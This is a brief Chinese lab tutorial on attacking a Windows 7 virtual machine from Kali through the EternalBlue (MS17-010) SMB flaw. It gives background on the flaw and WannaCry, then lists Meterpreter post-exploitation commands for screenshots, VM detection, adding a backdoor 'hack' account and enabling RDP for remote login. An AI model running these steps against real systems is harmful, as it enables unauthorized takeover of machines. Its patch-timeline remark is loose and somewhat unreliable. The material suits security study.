一、利用永恒之蓝(MS17-010)进行攻击
- 环境搭建:kali、Windows 7,其中WIN7为靶机。
- 永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
- 关于“SMB” ,SMB协议[Server Message Block]是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,网上邻居也是SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP协议的139端口和TCP445端口。
二、进入攻击阶段
拿到权限后,screenshot,截取目标当前屏幕。
run post/windows/gather/checkvm
查看目标主机是否在虚拟机中。
net user hack(用户名) 123456(密码) /add
添加用户hack到目标主机中。
net user 可以看到hack用户成功建立。
run post/windows/manage/enable_rdp
开启桌面远程连接。
rdesktpo 192.168.x.x(目标IP)。
出现其他用户,用hack登录。
成功登入,远程控制。